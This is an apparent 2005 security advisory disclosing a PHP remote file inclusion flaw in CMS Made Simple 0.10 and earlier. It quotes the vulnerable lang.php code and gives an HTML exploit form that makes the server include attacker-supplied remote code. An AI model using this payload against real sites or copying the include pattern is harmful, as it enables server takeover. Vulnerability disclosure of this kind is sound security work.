<<< Date Index >>>     <<< Thread Index >>>

CMS Made Simple <= 0.10 - PHP injection



   -- == -- == -- == -- == -- == -- == -- == -- == -- == --
   Name: CMS Made Simple - PHP injection 
   Version <= 0.10
   Homepage: http://www.cmsmadesimple.org/

   Author: Filip Groszynski (VXSfx)
   Date: 31 August 2005
   -- == -- == -- == -- == -- == -- == -- == -- == -- == --

   Background:

        CMS Made Simple is an easy to use content managment
   system for simple stable content site. Uses PHP, MySQL
   and Smarty templating system.

   --------------------------------------------------------
   
   Vulnerable code exist in ./admin/lang.php:

   <?php
        ...
        $current_language = "en_US";
        #Only do language stuff for admin pages
[!]     if (isset($CMS_ADMIN_PAGE)) {
                ...
                #Check to see if there is already a language in use...
                if (isset($_POST["change_cms_lang"])) {
[!]                     $current_language = $_POST["change_cms_lang"];
                        setcookie("cms_language", $_POST["change_cms_lang"]);
                } else if (isset($_COOKIE["cms_language"])) {
                        $current_language = $_COOKIE["cms_language"];
                }
                else {
                        ...
                }

                #Ok, we have a language to load, let's load it already...
                if (isset($nls['file'][$current_language])) {
                        foreach ($nls['file'][$current_language] as $onefile) {
[!]                             include($onefile);
                        }
                }
                ...
        }
        ...
   ?>
   --------------------------------------------------------

   Exploit:

        example.html:
          <form 
action="http://(__VICTIM__)/admin/lang.php?CMS_ADMIN_PAGE=1&nls[file][vx][vxsfx]=(__URL__)"
 method=post>
          <input type=hidden name=change_cms_lang value=vx>
          <input type=submit name=test VALUE="do it">
          </form>
        EOF

   --------------------------------------------------------

   Contact:

       Author: Filip Groszynski (VXSfx)
       Location: Poland <Warsaw>
       Email: groszynskif <|> gmail <|> com

   -- == -- == -- == -- == -- == -- == -- == -- == -- == --